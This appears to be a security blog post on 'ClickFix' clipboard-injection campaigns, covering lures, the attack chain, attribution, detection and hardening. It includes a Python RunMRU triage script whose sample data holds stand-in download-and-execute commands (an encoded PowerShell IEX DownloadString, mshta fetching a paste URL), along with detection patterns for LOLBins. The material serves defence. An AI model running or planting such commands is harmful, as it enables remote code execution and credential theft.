ProBackend

No Longer the Exception: How the Ingenious 'ClickFix' Hook Became Cybercrime's New Standard

An in-depth analysis of the massive surge in 'ClickFix' clipboard-injection campaigns, tracking its graduation from a novel proof-of-concept to the dominant delivery method utilized by top-tier cybercriminals and nation-state advanced persistent threat (APT) groups.

The day your mouse became a weapon

You’re browsing. Maybe it’s a news site, maybe a niche forum, maybe a legitimate streaming page that got roped into the mess. You click Play. Or maybe you click that button to download your invoice. Or maybe a CAPTCHA window pops up, telling you to prove you’re human.

Then it happens. A fake browser error. Or a Cloudflare check that just won’t quit. Or, in the most audacious version I’ve seen, your entire screen goes blue—Windows BSOD—complete with a fake error code and a bold "How to fix it?" button. You click.

The clipboard does its thing—pastes a command into your paste buffer without you even noticing—and the dialog box tells you, in perfect plain English, to open Run (Win+R), paste, and hit Enter. You’re helping it along.

This isn’t malware in the old sense. No trojan horse, no suspicious email attachment. Just a convincing lie wrapped in familiar UI, riding on your muscle memory to run code with your own permissions. If this feels creepy—and it should—it’s because the attackers finally cracked the hardest part: not out-smarting your firewall, but out-waiting your instinct to fix the thing that’s broken.

ClickFix isn’t some fringe experiment anymore. According to ESET, campaigns using this pattern jumped 517% in the first half of 2025 alone, and Microsoft’s threat intel team says it now reaches thousands of devices every single day. That’s the part that still chills me: this started as a researcher curiosity 18 months ago and has become the default delivery mechanism for Lumma Stealer, NetSupport RAT, AsyncRAT, DanaBot, and half a dozen other staples in the criminal ecosystem. In other words: ClickFix is no longer an exception. It’s now the rule.


How a simple paste built a malware empire

The brilliance—and the awful simplicity—of ClickFix lies in its non-technical shell game. Here’s what it looks like on the wire:

  1. Arrival vector: phishing email, malvertising, or a compromised landing page (often serving pirated content or fake invoices). In one May 2024 campaign tracked by Microsoft, threat actor Storm-1607 sent tens of thousands of emails with HTML attachments mimicking Microsoft Word errors, tricking victims into copying PowerShell commands.

  2. The hook: A visual cue that feels legitimate—Cloudflare CAPTCHA, Zoom/Google Meet connection issues, fake BSODs, or error messages on legitimate document viewers. In March 2025, Microsoft documented Storm-1865 impersonating Booking.com to trick hospitality-sector staff into "fixing" a fake reservation system error.

  3. Clipboard injection: JavaScript silently overwrites the clipboard with an obfuscated command string while the user reads the "instructions." This string looks benign at first glance but typically begins with powershell.exe -EncodedCommand, mshta.exe, or a curl/bitsadmin download call.

  4. User execution: The victim opens Run (Win+R), pastes the text, and hits Enter. No suspicious binary is downloaded; instead, a living-off-the-land binary (LOLBin) executes the encoded payload from memory.

  5. Multi-stage payload: The first stage drops a second, larger script that adds persistence (RunMRU registry tweaks, startup folder CMD files), checks for sandbox environments, and phones home. Only then does the final payload arrive—most commonly Lumma Stealer for credential harvesting, or RATs like NetSupport, AsyncRAT, or XWorm.

What’s insidious is how the attack chain leans on the user to complete steps that would otherwise trip traditional controls. Your EDR won’t flag powershell.exe launched from explorer.exe. Your mail gateway sees a plain-text email with no malicious attachment. The URL often points to a recently-registered domain or even a compromised legitimate site (WordPress, Pastebin). The whole operation rides on user consent disguised as help.


The fake that became real: lure variants observed in the wild

Hard2bit’s June 2026 analysis tracks at least five distinct lure templates that are still circulating in mid-2026. Each tries to exploit a different sense of normalcy:

Cloudflare CAPTCHA: The user lands on a compromised page and sees the familiar "Verify you are human" box, but the normal checkboxes don’t load. Instead, they’re instructed to open Win+R and paste. Microsoft’s August 2025 blog confirmed this appears in campaigns run by both criminal affiliate Storm-1607 and nation-state actors.

Simulated Word/Chrome errors: Proofpoint TA571 frequently used HTML attachments pretending to be Microsoft Word documents showing "can’t display" errors with a built-in "How to fix?" link. The pattern later reappeared in Chrome crashes, missing codec alerts, and even fake DNS failures.

Download-site verification: Recent campaigns for pirated software, cracks, or driver downloads present a "verify you’re not a bot" screen before the download. This is indistinguishable from the legitimate site, and it includes a clipboard-injected PowerShell one-liner.

Meeting links and reservations: Beyond Booking.com, attackers have impersonated Microsoft Teams, Google Meet, Zoom invites, and travel confirmations. In one late-2025 case, a fake Zoom error asked victims to paste commands into Terminal on macOS—proving ClickFix isn’t just a Windows play.

Fake BSOD simulation: The most psychologically potent variant presents a near-perfect replica of the Windows Blue Screen of Death, complete with error codes and driver names. The prompt tells you to paste a PowerShell repair script to fix the crash. ESET noted this spike in Q4 2025 among incident responders.

The common thread? Every lure assumes you already know how to open Win+R or Terminal and that pasting a command is an innocuous, routine act. For most users—and yes, even for some IT staff—the reflex is to comply before reading the fine print.


From research curiosity to nation-state staple: attribution and adoption

ClickFix went from proof-of-concept to prime-time threat incredibly fast. Microsoft’s research places its first observed use in April 2024 with TA571 campaigns delivering DarkGate loaders. By H1 2025, ESET’s telemetry showed a 517% uptick, and Microsoft confirmed thousands of daily infections across multiple industries.

The commoditization followed shortly after. Hard2bit reports that ClickFix-as-a-Service kits began appearing on dark web forums, bundling CAPTCHA templates, domain rotation, and payload choice. That “plug-and-play” availability made ClickFix a go-to for lower-tier ransomware affiliates and access brokers who lacked the scripting expertise to build custom lures.

By late 2025, nation-state actors adopted the technique—not because it was new, but because it was reliable. Virus Bulletin’s VB2025 abstract confirms attribution to:

• APT28 (Russia)
• Kimsuky (North Korea)
• MuddyWater (Iran)

Microsoft’s report ties Storm-1607, Storm-0426, and Storm-0249 to the proliferation of ClickFix campaigns. These are not lone wolves; they’re organized threat groups who realized this vector bypasses most perimeter controls and doesn’t require zero-day exploits—just psychology.


Detection that actually works: hunting what the vector leaves behind

The good news is ClickFix, for all its cleverness, leaves a clear trail. You just have to look in the right places:

RunMRU is your best friend: The HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU registry key logs every command typed into Win+R. On a healthy workstation, this key shouldn’t contain PowerShell -EncodedCommand, mshta.exe, curl with base64, or URLs pointing to paste services. Microsoft Defender XDR KQL queries targeting this key produce near-zero false positives.

Anomalous process trees: The chain explorer.exe → powershell.exe (or mshta.exe, conhost.exe) with long encoded arguments is a strong signal. EDR products can alert on command lines containing -EncodedCommand, -nop, -W hidden, or IEX. If your org uses PowerShell legitimately, enforce Constrained Language Mode via AppLocker or WDAC policy so ad-hoc scripts cannot run with full language access.
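The two hunts above (RunMRU entries and suspicious PowerShell command lines) in one small triage script, added here as an illustration rather than code from the original post or from any of the vendors it cites. It runs over a constructed RunMRU export (the value names, the MRUList ordering and the trailing "\1" suffix mirror how Explorer stores the key; the commands themselves are made-up sample data), decodes any -EncodedCommand blob, and reports why each entry looks like a ClickFix launch; the same triage() function can be pointed at EDR command-line fields.

```python
import base64
import re

# Constructed RunMRU export (sample data, not real telemetry), shaped like the
# output of reg.exe / Get-ItemProperty: one value per command, each carrying the
# "\1" suffix Explorer appends, plus MRUList giving newest-first order.
ENCODED_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.invalid/raw/x')"
ENCODED_B64 = base64.b64encode(ENCODED_PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_RUNMRU = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "control\\1",
    "c": "mshta https://pastebin.invalid/raw/y\\1",
    "d": "powershell -nop -w hidden -EncodedCommand " + ENCODED_B64 + "\\1",
}

# -EncodedCommand accepts any unambiguous prefix (-e, -ec, -enc ...); capture the blob.
ENCODED = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
SUSPICIOUS = [
    (ENCODED, "encoded PowerShell command"),
    (re.compile(r"\bmshta(?:\.exe)?\b", re.I), "mshta LOLBin"),
    (re.compile(r"\b(?:curl|bitsadmin|certutil)(?:\.exe)?\b", re.I), "download LOLBin"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "Invoke-Expression"),
    (re.compile(r"-(?:nop|noprofile|w(?:indowstyle)?\s+hidden|ep\s+bypass)\b", re.I), "PowerShell evasion switch"),
    (re.compile(r"https?://\S*(?:pastebin|hastebin|paste\.ee)", re.I), "paste-service URL"),
]

def parse_runmru(values):
    """Run-box commands newest-first, with Explorer's trailing '\\1' removed."""
    cmds = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is not None:
            cmds.append(raw[:-2] if raw.endswith("\\1") else raw)
    return cmds

def decode_encoded_command(cmd):
    """Decode a -EncodedCommand blob (base64 of a UTF-16LE script), or None."""
    if not (m := ENCODED.search(cmd)):
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # bad padding or not valid UTF-16
        return None

def triage(cmd):
    """Reasons this command looks like a ClickFix launch; empty list means benign."""
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else cmd + " " + decoded  # scan the decoded script too
    return [label for rx, label in SUSPICIOUS if rx.search(text)]

def hunt(values):
    """(command, reasons, decoded_script) for every suspicious RunMRU entry, newest first."""
    return [(c, triage(c), decode_encoded_command(c)) for c in parse_runmru(values) if triage(c)]
```

On a live host, feed parse_runmru() the output of Get-ItemProperty on the RunMRU key (or a reg.exe export) instead of the sample dictionary; the heuristics are deliberately loose, so treat a hit as a triage lead, not a verdict.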

Network telemetry after execution: The loader always phones home for the second stage. An outbound connection from powershell.exe to a freshly registered domain or pastebin site should trigger high-severity alerts, especially if you’re running attack surface management.

Virus Bulletin’s Prashant Tilekar notes that many defenders focus on blocking the final payload, but the real win is catching the clipboard injection and Win+R launch before the loader runs. That’s where behavioral analytics beat signature-based detection every time.


Defences that actually matter: hardening before the click

There’s no single switch to turn ClickFix off, but three concrete layers make it significantly harder:

Endpoint hardening via GPO and ASR

Microsoft Defender’s Attack Surface Reduction (ASR) rules are particularly effective:

• Block obfuscated script execution
• Prevent Office apps from creating child processes
• Block PSExec/WMI process creation
• Stop unsigned files from running on endpoints

Beyond ASR, consider disabling Win+R for standard users via GPO. That alone kills the most common ClickFix lure. For admin and dev profiles, use AppLocker or WDAC to restrict which binaries can be invoked interactively.

Lock down PowerShell and LOLBins

The baseline should include:

• PowerShell Constrained Language Mode
• Script block logging shipped to your SIEM
• Transcription enabled
• AMSI integrated

mshta.exe, bitsadmin, regsvr32, and rundll32 are well-known LOLBins. If your analysts don’t need them, block them entirely on non-admin profiles.

Identity as the last line of defense

When credentials do get pilfered (and they will), a strong identity layer limits damage:

• Phishing-resistant MFA on privileged access
• Short session lifetimes on critical apps
• Block legacy authentication protocols

The point isn’t to stop ClickFix—because eventually, it will bypass a few controls—but to reduce the value of stolen cookies and session tokens.


Training that sticks: one simple rule for the workforce

Traditional phishing simulations don’t prepare users for ClickFix. The recipient isn’t opening an attachment or clicking a dodgy link; they’re being asked to paste text and press Enter—actions that feel routine in office culture.

What actually works is a single, unbreakable rule:

No legitimate vendor, no internal system, and no website will ever ask you to paste commands into a system window. Ever. If you’re asked, it’s always a scam.

That sentence needs to be repeated in onboarding, internal signage, and security trainings. For IT and dev teams, add a reflex drill: read the command line before you run it—especially when copying from Stack Overflow, ChatGPT, or external docs. A harmless internal simulation (e.g., pasting calc.exe and notifying the security team) beats five fake email quizzes.


What to do if the click already happened

If ClickFix has already executed, treat it like any endpoint compromise:

  1. Isolate the workstation
  2. Collect evidence: pull the RunMRU key and process tree
  3. Rotate passwords and revoke session tokens in Entra ID (or your IdP)
  4. Scan the estate for indicators
  5. Open formal incident response

Assume the affected endpoint was not the only target: ClickFix campaigns often bounce against multiple victims within an org before one falls.

If in-house capacity isn’t available to act within hours, bring in a managed IR service or 24/7 SOC. The difference between containment and regulatory breach often comes down to minutes.


ClickFix isn’t going away in 2026. It’s too cheap, too reliable, and too commoditized. The “ClickFix-as-a-Service” kits already bundle CAPTCHA templates, rotating domains, and payload choice. For attackers, it’s a turnkey solution for bypassing perimeter defenses.

The takeaway isn’t fear. It’s awareness. The technique works only when users forget to question the "fix." Your best defense is a workforce trained to treat clipboard prompts with the same skepticism they’d show a suspicious email attachment.

The bad guys didn’t find a new zero-day. They just leaned on human nature, polished it with JavaScript, and called it a "repair tool." That’s the real horror—and the best reason to keep your people sharp.
